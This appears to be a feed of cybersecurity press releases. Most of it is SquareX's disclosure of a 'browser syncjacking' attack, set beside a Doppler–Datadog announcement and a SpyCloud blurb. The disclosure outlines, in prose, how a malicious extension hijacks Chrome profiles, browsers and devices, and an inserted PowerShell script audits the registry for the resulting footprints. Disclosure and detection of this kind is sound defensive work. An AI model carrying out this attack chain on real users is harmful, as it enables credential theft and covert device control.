SpyCloud transforms recaptured darknet data to disrupt cybercrime. Its automated holistic identity threat protection solutions leverage advanced analytics to proactively prevent ransomware and account takeover, safeguard employee and consumer accounts, and accelerate cybercrime investigations. SpyCloud’s data from breaches, malware-infected devices, and successful phishes also powers many popular dark web monitoring and identity theft protection offerings. Customers include seven of the Fortune 10, along with hundreds of global enterprises, mid-sized companies, and government agencies worldwide. Headquartered in Austin, TX, SpyCloud is home to more than 200 cybersecurity experts whose mission is to protect businesses and consumers from the stolen identity data criminals are using to target them now.

To learn more and see insights, users can visit spycloud.com.

Contact

Public Relations
Emily Brown
REQ on behalf of SpyCloud
ebrown@req.co

The post SpyCloud Pioneers the Shift to Holistic Identity Threat Protection appeared first on Cybersecurity Insiders.

San Francisco, United States / California, January 30th, 2025, CyberNewsWire

Doppler, the leading provider of secrets management solutions, announced a new integration with Datadog, a cloud application monitoring and security platform. This collaboration provides engineering and operations teams with an integrated solution for securely managing sensitive credentials and gaining insights into cloud environments through real-time monitoring.

In an era of rapid cloud adoption, DevOps and security teams face mounting challenges in safeguarding sensitive data across distributed systems. By combining Doppler’s automated secrets management capabilities with Datadog’s comprehensive monitoring platform, this integration enables teams to enhance their security practices while maintaining operational visibility. Doppler’s automated secrets storage and rotation, paired with Datadog’s continuous monitoring, empowers teams to mitigate risks of secret sprawl and prevent unauthorized access in a scalable, automated fashion.

Streamlining security and visibility across cloud environments

Many DevOps teams struggle to maintain consistent security practices because secrets are often scattered across environments, increasing the risk of misconfigurations. The Doppler integration with Datadog addresses this issue head-on by creating a centralized workflow for managing secrets and monitoring activity across all environments. With Datadog’s alerts and Doppler’s automated security measures, teams can detect and respond to suspicious activity, helping to ensure security and compliance.

“We are thrilled to integrate with Datadog to combine our secrets management capabilities with their monitoring platform,” said Brian Vallelunga, CEO and Founder of Doppler. “This integration simplifies security for developers and gives organizations the ability to manage secrets at scale, gaining visibility and control over sensitive information across the entire cloud environment. Together, we’re helping teams protect their data while allowing them to stay focused on building great software.”

How the Doppler-Datadog Integration Solves Key Security Challenges

  • Automated secrets management: Doppler’s platform automates the rotation, storage, and encryption of secrets, minimizing the risk of human error and unauthorized access.
  • Real-time monitoring and alerts: Datadog’s continuous monitoring enables teams to track secret usage, receive alerts for suspicious access, and respond quickly to any anomalies.
  • Security across hybrid environments: This integration unifies secrets management and monitoring, providing consistency in security practices across hybrid and multi-cloud setups.

Centralized deployment for DevOps and Security teams

The integration allows teams to centralize secrets management in Doppler while benefiting from Datadog’s secret usage observability. This provides a simplified solution for both managing and monitoring sensitive information. This approach enhances security without disrupting workflows, helping organizations to meet compliance requirements, reduce risk, and modernize their operations.

Availability

The integration is available now. For more information on how this integration can improve users’ security posture and secrets management, users can visit the Datadog Integration Documentation.

About Doppler

Doppler is a leader in secrets management, providing a centralized, secure solution that automates handling sensitive information such as API keys, tokens, and credentials. Thousands of development teams worldwide trust Doppler to simplify secrets management, improve operational efficiency, and prevent data breaches.

Contact

Doppler Press
press@doppler.com

The post Doppler announces integration with Datadog to streamline security and monitoring appeared first on Cybersecurity Insiders.

Palo Alto, USA, January 30th, 2025, CyberNewsWire

SquareX discloses a new attack technique that shows how malicious extensions can be used to completely hijack the browser, and eventually, the whole device.

Browser extensions have been under the spotlight in enterprise security news recently due to the wave of OAuth attacks on Chrome extension developers and data exfiltration attacks. However, until now, due to the limitations browser vendors place on the extension subsystem and extensions, it was thought to be impossible for extensions to gain full control of the browser, much less the device.

SquareX researchers Dakshitaa Babu, Arpit Gupta, Sunkugari Tejeswara Reddy and Pankaj Sharma debunked this belief by demonstrating how attackers can use malicious extensions to escalate privileges and conduct a full browser and device takeover, all with minimal user interaction. Critically, the malicious extension only requires read/write capabilities present in the majority of browser extensions on the Chrome Store, including common productivity tools like Grammarly, Calendly and Loom, which desensitizes users to granting these permissions. This revelation suggests that virtually any browser extension could potentially serve as an attack vector if created or taken over by an attacker. To the best of our understanding, extensions submitted to the Chrome Store requesting these capabilities are not put through additional security scrutiny at the time of this writing.

The browser syncjacking attack can be broken up into three parts: how the extension silently adds a profile managed by the attacker, hijacks the browser and eventually gains full control of the device.

Profile Hijacking

The attack begins with an employee installing any browser extension – this could involve publishing one that masquerades as an AI tool or taking over existing popular extensions that may have up to millions of installations in aggregate. The extension then “silently” authenticates the victim into a Chrome profile managed by the attacker’s Google Workspace. This is all done in an automated manner in a background window, making the whole process almost imperceptible to the victim. Once this authentication occurs, the attacker has full control over the newly managed profile in the victim’s browser, allowing them to push automated policies such as disabling safe browsing and other security features.

Using a very clever social engineering attack that exploits trusted domains, the adversary can then further escalate the profile hijacking attack to steal passwords from the victim’s browser. For example, the malicious extension can open and modify Google’s official support page on how to sync user accounts to prompt the victim to perform the sync with just a few clicks. Once the profile is synced, attackers have full access to all credentials and browsing history stored locally. As this attack only leverages legitimate sites and has no visible sign that it has been modified by the extension, it will not trigger any alarm bells in any security solutions monitoring the network traffic.

Browser Takeover

To achieve a full browser takeover, the attacker essentially needs to convert the victim’s Chrome browser into a managed browser. The same extension monitors and intercepts a legitimate download, such as a Zoom update, and replaces it with the attacker’s executable, which contains an enrollment token and registry entry to turn the victim’s Chrome browser into a managed browser. Thinking that they downloaded a Zoom updater, the victim executes the file, which ends up installing a registry entry that instructs the browser to become managed by the attacker’s Google Workspace. This allows the attacker to gain full control over the victim’s browser to disable security features, install additional malicious extensions, exfiltrate data and even silently redirect users to phishing sites. This attack is extremely potent as there is no visual difference between a managed and unmanaged browser. For a regular user, there is no telltale sign that a privilege escalation has occurred unless the victim is highly security aware and goes out of their way to regularly inspect their browser settings and look for associations with an unfamiliar Google Workspace account.

Device Hijacking

With the same downloaded file above, the attacker can additionally insert registry entries required for the malicious extension to message native apps. This allows the extension to directly interact with local apps without further authentication. Once the connection is established, attackers can use the extension in conjunction with the local shell and other available native applications to secretly turn on the device camera, capture audio, record screens and install malicious software – essentially providing full access to all applications and confidential data on the device.
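The two persistent footprints this write-up describes, a cloud-management enrollment token that turns Chrome into a managed browser and a native messaging host registration that lets an extension talk to a local program, both live in the Windows registry and can be audited from the defender's side. The script below is an added example and not SquareX's code; it assumes Google Chrome on Windows and uses Chrome's documented policy key (`CloudManagementEnrollmentToken` under `SOFTWARE\Policies\Google\Chrome`) and native messaging host keys (`SOFTWARE\Google\Chrome\NativeMessagingHosts`). The triage heuristics (flagging an unsigned host binary or a manifest stored under a user-writable profile directory) are the author's own assumptions about what merits a closer look, not a verdict.

```powershell
# Added defender-side audit (not SquareX's code). Enumerates Chrome cloud-management
# enrollment tokens and native messaging host registrations on a Windows host and
# flags entries worth investigating. Run from an elevated prompt for HKLM coverage.

# Documented Chrome registry locations (assumption: Google Chrome; Edge has
# equivalent keys under the Microsoft hive and is not covered here).
$EnrollmentKeys = @(
    'HKLM:\SOFTWARE\Policies\Google\Chrome',
    'HKCU:\SOFTWARE\Policies\Google\Chrome'
)
$NativeHostKeys = @(
    'HKLM:\SOFTWARE\Google\Chrome\NativeMessagingHosts',
    'HKLM:\SOFTWARE\WOW6432Node\Google\Chrome\NativeMessagingHosts',
    'HKCU:\SOFTWARE\Google\Chrome\NativeMessagingHosts'
)

# Returns any enrollment token found. A token on a host that your organisation
# never enrolled in Chrome Browser Cloud Management is a strong indicator.
function Get-ChromeEnrollmentToken {
    foreach ($key in $EnrollmentKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        if ($props.PSObject.Properties.Name -contains 'CloudManagementEnrollmentToken') {
            [pscustomobject]@{
                Key   = $key
                Token = $props.CloudManagementEnrollmentToken
            }
        }
    }
}

# Returns one record per registered native messaging host, resolving the manifest
# JSON, the host binary it points at, and which extension IDs may call it.
function Get-ChromeNativeMessagingHost {
    foreach ($key in $NativeHostKeys) {
        if (-not (Test-Path $key)) { continue }
        foreach ($hostKey in Get-ChildItem -Path $key) {
            # The key's default value is the path to the host manifest.
            $manifestPath = (Get-ItemProperty -Path $hostKey.PSPath).'(default)'
            $manifest = $null
            $exe = $null
            $origins = $null
            $sigStatus = 'NoManifest'
            if ($manifestPath -and (Test-Path $manifestPath)) {
                try { $manifest = Get-Content -Raw -Path $manifestPath | ConvertFrom-Json } catch { }
            }
            if ($manifest) {
                # On Windows the manifest "path" may be relative to the manifest's directory.
                $exe = $manifest.path
                if ($exe -and -not [System.IO.Path]::IsPathRooted($exe)) {
                    $exe = Join-Path (Split-Path -Parent $manifestPath) $exe
                }
                $origins = ($manifest.allowed_origins -join ', ')
                $sigStatus = if ($exe -and (Test-Path $exe)) {
                    (Get-AuthenticodeSignature -FilePath $exe).Status.ToString()
                } else { 'MissingBinary' }
            }
            # Heuristic (assumption): hosts that are unsigned or live under a user-writable
            # profile directory deserve a second look; legitimate hosts usually do not.
            $userWritable = $manifestPath -match '\\AppData\\|\\Temp\\|\\Downloads\\'
            $suspicious = ($sigStatus -ne 'Valid') -or $userWritable
            [pscustomobject]@{
                HostName       = $hostKey.PSChildName
                RegistryKey    = ($hostKey.Name)
                ManifestPath   = $manifestPath
                Executable     = $exe
                AllowedOrigins = $origins
                Signature      = $sigStatus
                Suspicious     = $suspicious
            }
        }
    }
}

Write-Host '== Chrome cloud-management enrollment tokens =='
Get-ChromeEnrollmentToken | Format-Table -AutoSize

Write-Host '== Native messaging hosts =='
Get-ChromeNativeMessagingHost | Sort-Object Suspicious -Descending | Format-Table -AutoSize
```

Each `AllowedOrigins` entry is a `chrome-extension://<id>/` origin; cross-check those IDs against the extensions actually present in `chrome://extensions`, and treat an enrollment token that does not match your own Chrome Browser Cloud Management tenant as an incident to escalate. The same audit can be scheduled through your EDR or configuration-management tooling so that a new registration raises an alert rather than waiting for a manual review.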

The browser syncjacking attack exposes a fundamental flaw in the way remotely managed profiles and browsers are administered. Today, anyone can create a managed workspace account tied to a new domain and a browser extension without any form of identity verification, making it impossible to attribute these attacks. Unfortunately, most enterprises currently have zero visibility into the browser: most do not have managed browsers or profiles, nor any visibility into the extensions employees are installing, often based on trending tools and social media recommendations.

What makes this attack particularly dangerous is that it operates with minimal permissions and nearly no user interaction, requiring only a subtle social engineering step using trusted websites – making it almost impossible for employees to detect. While recent incidents like the Cyberhaven breach have already compromised hundreds, if not thousands of organizations, those attacks required relatively complex social engineering to operate. The devastatingly subtle nature of this attack – with an extremely low threshold of user interaction – not only makes this attack extremely potent, but also sheds light on the terrifying possibility that adversaries are already using this technique to compromise enterprises today.

Unless an organization chooses to completely block browser extensions via managed browsers, the browser syncjacking attack will completely bypass existing blacklists and permissions-based policies. SquareX’s founder Vivek Ramachandran says, “This research exposes a critical blind spot in enterprise security. Traditional security tools simply can’t see or stop these sophisticated browser-based attacks. What makes this discovery particularly alarming is how it weaponizes seemingly innocent browser extensions into complete device takeover tools, all while flying under the radar of conventional security measures like EDRs and SASE/SSE Secure Web Gateways. A Browser Detection-Response solution isn’t just an option anymore – it’s a necessity. Without visibility and control at the browser level, organizations are essentially leaving their front door wide open to attackers. This attack technique demonstrates why security needs to ‘shift up’ to where the threats are actually happening: in the browser itself.”

SquareX has been conducting pioneering security research on browser extensions, including the DEF CON 32 talk Sneaky Extensions: The MV3 Escape Artists that revealed multiple MV3 compliant malicious extensions. This research team was also the first to discover and disclose the OAuth attack on Chrome extension developers one week before the Cyberhaven breach. SquareX was also responsible for the discovery of Last Mile Reassembly attacks, a new class of client-side attacks that exploits architectural flaws and completely bypasses all Secure Web Gateway solutions. Based on this research, SquareX’s industry-first Browser Detection and Response solution protects enterprises against advanced extension-based attacks including device hijacking attempts by conducting dynamic analysis on all browser extension activity at runtime, providing a risk score to all active extensions across the enterprise and further identifying any attacks that they may be vulnerable to.

For more information about the browser syncjacking attack, additional findings from this research are available at sqrx.com/research.

About SquareX

SquareX helps organizations detect, mitigate and threat-hunt client-side web attacks happening against their users in real time.

SquareX’s industry-first Browser Detection and Response (BDR) solution takes an attack-focused approach to browser security, ensuring enterprise users are protected against advanced threats like malicious QR Codes, Browser-in-the-Browser phishing, macro-based malware and other web attacks encompassing malicious files, websites, scripts, and compromised networks.

Additionally, with SquareX, enterprises can provide contractors and remote workers with secure access to internal applications and enterprise SaaS, and convert the browsers on BYOD / unmanaged devices into trusted browsing sessions.

Contact

Head of PR
Junice Liew
SquareX
junice@sqrx.com

The post SquareX Discloses “Browser Syncjacking”, a New Attack Technique that Provides Full Browser and Device Control, Putting Millions at Risk appeared first on Cybersecurity Insiders.